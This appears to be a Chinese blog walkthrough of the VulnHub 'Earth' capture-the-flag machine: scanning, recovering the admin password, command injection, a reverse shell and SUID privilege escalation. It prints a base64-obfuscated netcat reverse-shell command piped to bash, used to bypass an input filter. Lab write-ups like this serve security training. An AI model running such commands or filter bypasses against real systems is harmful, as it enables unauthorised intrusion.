Earth命令注入渗透测试

最新推荐文章于 2024-07-17 17:36:22 发布
最新推荐文章于 2024-07-17 17:36:22 发布
阅读量1.3k 收藏 28
点赞数 36
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhouA0221/article/details/140082706
版权

目录

1      信息收集....

1.1       IP地址探测....

1.2       对目标主机进行网络扫描....

1.3       目录枚举....

1.4       密码破解....

2      漏洞查找....

2.1       命令行注入漏洞....

2.2       nc传输文件分析....

3      漏洞利用....

3.1       利用命令行漏洞获取目标主机的SHELL.

3.2       获取交互式SHELL.

4      提权....

4.1       利用SUID位进行提权....

5      总结....

  1. 信息收集
    1. IP地址探测

使用arp-scan进行IP地址探测

发现目标主机ip地址为172.30.1.130

    1. 对目标主机进行网络扫描

使用工具nmap

-v 显示详细信息(支持多个v显示更详细)

-p- 扫描所有端口

-T4 进行野蛮的扫描(速度快,常用的选项)

-sV 显示端口服务的版本

-sC 使用nmap自带的脚本引擎扫描

我们通过Nmap扫描发现目标主机有两个域名资产

我们的第一个思路就可以通过目标主机的Web进行

HTTP探测

http://172.30.1.134

https://172.30.1.134

通过访问HTTP和HTTPS并没有发现有用信息,联想到通过扫描发现的两个域名

DNS1:earth.local

DNS2:terratest.earth.local

进行域名解析(hosts文件)

域名写入/etc/hosts

通过域名访问

http://earth.local/  http://terratest.earth.local/ 发现一个信息发送界面作用未知三串疑似密文的数字

    1. 目录枚举

目录枚举的工具有很多,我们使用kali自带的dirb进行后台扫描

使用dirb扫描https://earth.local/站点

我们发现了一个admin响应码301的目录 我们通过访问看到这是一个管理员的登录窗口。还发现了一个cgi-bin的目录403我们被拒绝访问。

使用dirb扫描https://terratest.earth.local/ 站点

看到第一个还是cgi-bin的目录,还是403访问不了

第二个index.html的目录,这是网站的首页文件

第三个robots.txt 这个文本文件是告诉网站搜索引擎哪些内容不应被搜索引擎爬取

这是种约定俗成的规则,不能被爬取的内容一定是很重要,越是不让我们访问,我们就应该越访问

我们使用curl查看页面信息这样比较方便

-k 不对证书做检查

我们发现了一个/testingnotes.*文件,我们猜测这应该是一个以txt后缀的文本文件

我们直接使用curl看一下这个文件

我们从文件内容可以看到这是XOR的加密方式,得知了一个testdata.txt的文本文件用于测试加密,管理员的用户名terra。

我们得知了一个testdata.txt的文本文件用于测试加密,我们直接使用curl查看一下这个文本文件的内容。

得到了加密方式XOR,用来加密的内容也有了

我们可以看到这是一个16进制的数组

    1. 密码破解

我们使用CyberChef来解密一下

这样我们就得到了管理员的密码。

https://earth.local/admin

用户名 terra

密码 earthclimatechangebad4humans

  1. 漏洞查找
    1. 命令行注入漏洞

我尝试登录试试

看到一个命令行,我们试着输入一下,可以正常输出

探测命令注入的流程:

1. 是否调用系统命令

2. 命令或命令的参数是否可控【确认可控字段】

3. 能否拼接注入命令

4. 能否通过代理(如Burp suite)拦截修改命令

    1. nc传输文件分析

利用命令执行漏洞获取系统的SHELL-GetSHELL

  1. 确认目标系统是否有nc工具:which nc

  1. 漏洞利用
    1. 利用命令行漏洞获取目标主机的SHELL

Kali打开4444端口侦听,等待目标主机连接

Kali打开4444端口侦听,等待目标主机连接

程序用户发现不能执行IP地址,所以进行编码转换绕过

反弹SHELL命令转换为Base64的编码

解密后传给bash

转换后Base64的编码解密

echo 'bmMgMTcyLjMwLjEuMjAgNDQ0NCAtZSAvYmluL2Jhc2gK' | base64 -d | bash

我们已经获得了目标主机的SHELL

Id验证是否拿到SHELL

来自172.30.1.130的连接

    1. 获取交互式SHELL

可以看到已经拿到目标主机的交互式SHELL

使用python拿到交互式SHELL

  1. 提权
    1. 利用SUID位进行提权

查找系统中由SUID权限的文件

我们看到一个reset_root的文件,这应该是一个重置root密码的文件

我们对这个文件做检查

对该文件做分析,我们使用kali中的工具

使用nc把该文件传给kali

使用kali做侦听

通过重定向传输该文件

校验数据完整性—hash(哈希)算法

md5sum—计算文件的MD5值(128位)

md5sum /usr/bin/reset_root(靶机)

md5sum reset_root(kali)      确保一致

利用ltrace跟踪调用情况

发现没有这三个目录

那我们就去创建这三个目录

使用touch创建这三个目录

创建之后我们运行这个文件

运行之后我们可以看到密码已经重置为Earth

我们已经登录成功了,拿到root权限了

查看当前目录下的旗

我们看到了地球,这表明已经夺旗成功了

  1. 总结

1、使用arp-scan只能用在局域网环境探测存活主机IP地址。

2、在开始没有思路时可以对目标主机的web下手。

3、目录枚举时要选对合适的字典,才能更精准的把控目标的信息。

4、加密密码是16进制我们要把它先转换。

5、获得管理员密码和账号登录可以先id确认一下是否有回显。

6、再确认目标主机是否有nc,因为我们要使用kali的工具进行分析。

7、使用目标主机连接kali,发现IP地址不能被输入,我们可以使用base64加密,欺骗目标主机,或者可以把id地址转换成十进制绕过达到欺骗目标主机的目的。

8、由于目标主机限制太多,不能肆意发挥,所以我们把需要分析的文件,发动我们的kali中,kali工具较多,方便我们进行文件分析。

9、文件传输后我们使用md5sum—计算文件的MD5值(128位)校验一下数据的完整性。

10、ltrace工具:跟踪进程调用库函数的情况运行文件查看在哪一步出错,精准把控。

白帽子二三
关注
  • 36
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5639
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
CTF-Anubis HackTheBox 渗透测试(二)
hongrisec的博客
10-19 804
大家好,我是你们好朋友小峰。预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章。
VulnHub Earth进行渗透测试的总结与过程
雨泽网络工作室
11-18 666
VulnHub Earth进行渗透测试的总结与过程
靶机渗透练习The Planets:Earth
Have_a_great_day的博客
12-17 1979
命令的目的是快速扫描目标网络中的主机,通过向主机发送 ping 消息来确认其可达性而不进行端口扫描。命令的含义是在系统的根目录下递归地查找具有 Setuid 权限的普通文件,并将结果打印出来。该命令的含义是以当前用户的身份,查询其在系统上被授予的 sudo 特权,并显示与该用户相关的 sudo 配置和权限信息。Crontab 是一种用于定时执行任务的工具,允许用户根据指定的时间和频率来自动执行脚本或命令。是使用 nmap 工具执行的命令,它用于进行主机发现,并对目标网络中的主机进行快速扫描。
planet_Earth靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-01 928
planet_Earth 靶场渗透记录
渗透实战-vulnhub-The Plants:Earth
qq_52263650的博客
03-10 111
渗透实战-vulnhub-The Plants:Earth
第十一章 无线渗透测试 操作篇
stone的博客
04-14 812
AIRCRACK-NG 无线渗透和审计神器 包含各种功能的工具套件 网络检测 嗅探抓包 包注入 密码破解 AIRODUMP-NG BSSID:AP的MAC地址 PWR:网卡接收到的信号强度,距离越近信号越强 -1:驱动不支持信号强度,STA距离超出信号接受范围 RXQ:最近10秒成功接收的数据帧的百分比(数据、管理帧),只有在固定信道时才出现 BEACONS:接收到此AP发送的beacon帧数量...
cURL在Web渗透测试中的应用
蚁景网安学院
04-10 508
概述cURL是一个命令行下用于传输数据的工具,支持多种协议cURL有如下特性:1、支持多种协议,包括:DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS...
渗透神器----Windows10 渗透工具包
热门推荐
tlovejr的博客
04-20 1万+
前言 这几天一直有工作,所以就没有来的及去更新靶场还有CTF试题,接下来给大家更新一个优秀的工具:2022年最新Windows10 渗透工具包镜像 系统简介 基于Win10 Workstation 21H2 x64 MSDN原版镜像制作; 完整安装WSL Kali Linux 2022.1,并配置图形化模式; 精简系统自带软件,美化字体及部分图标,适度优化; 镜像容量74.5G,使用单磁盘文件存储,提升性能; 建议运行环境: vmware:16.0 运行内存:8G 固态硬盘:100G 免责声明
osgearth-3.1
11-17
osgEarth是一个开源的、基于OpenGL的三维地理可视化库,它构建在OpenSceneGraph(OSG)之上,提供了强大的地球渲染和地图服务集成功能。"osgearth-3.1"是osgEarth项目的第3.1版本的源代码包,用于开发人员进行地理...
osgearth-3.3.zip
11-17
osgEarth是一个开源的、基于OpenGL的三维地理可视化库,它利用OpenSceneGraph(OSG)的强大功能来渲染地球数据。这个“osgearth-3.3.zip”文件包含了osgEarth库的版本3.3的源代码,是开发人员进行地图应用和地球可视...
qml+osgearth
04-01
《QML与osgEarth结合应用详解》 QML(Qt Meta Language)是Qt框架下的一种声明式编程语言,常用于创建用户界面,以其简洁、直观的语法和强大的2D及3D图形渲染能力受到开发者喜爱。而osgEarth则是一个基于开源三维...
osgEarth 3.2帮助文档开发手册
05-19
osgEarth 3.2帮助文档开发手册,最新版,chm格式
osgEarth3.3VS2022X64
07-20
osgEarth3.3 最新版 VS2022编译,64位
web安全之跨站脚本攻击xss
最新发布
奔跑的小猪仔
07-17 397
xss 跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意js代码,当用户浏览该页之时,嵌入其中web里面的js代码会被执行,从而达到恶意的特殊目的。
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 384
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
LS_Ai的博客
07-17 896
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 864
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
osgearth碰撞检测
08-13
osgEarth是一个基于OpenSceneGraph的开源地理空间引擎,它提供了许多地理空间功能,包括地形渲染、影像贴图、矢量数据显示等。至于碰撞检测,osgEarth本身并没有提供直接的碰撞检测功能,但你可以结合OpenSceneGraph的碰撞检测功能来实现。 在OpenSceneGraph中,你可以使用OsgUtil库中提供的碰撞检测类来进行碰撞检测。具体步骤如下: 1. 创建一个osgUtil::Intersector对象,用于表示你要进行碰撞检测的对象。 2. 设置Intersector对象的参数,例如设置检测的物体、设置检测的方式等。 3. 调用Intersector对象的intersect方法进行碰撞检测,该方法会返回一个osgUtil::Intersector::Intersection结构体,其中包含了碰撞点等信息。 4. 根据返回的Intersection信息进行相应处理,例如判断是否发生碰撞、获取碰撞点的位置等。 需要注意的是,osgEarth中的地形数据通常是由地形瓦片组成的,碰撞检测需要对每个地形瓦片进行检测。你可以使用osgEarth提供的接口来获取地形数据,并将其转换为OpenSceneGraph中的节点进行碰撞检测。 希望这些信息对你有所帮助!如果你有任何进一步的问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值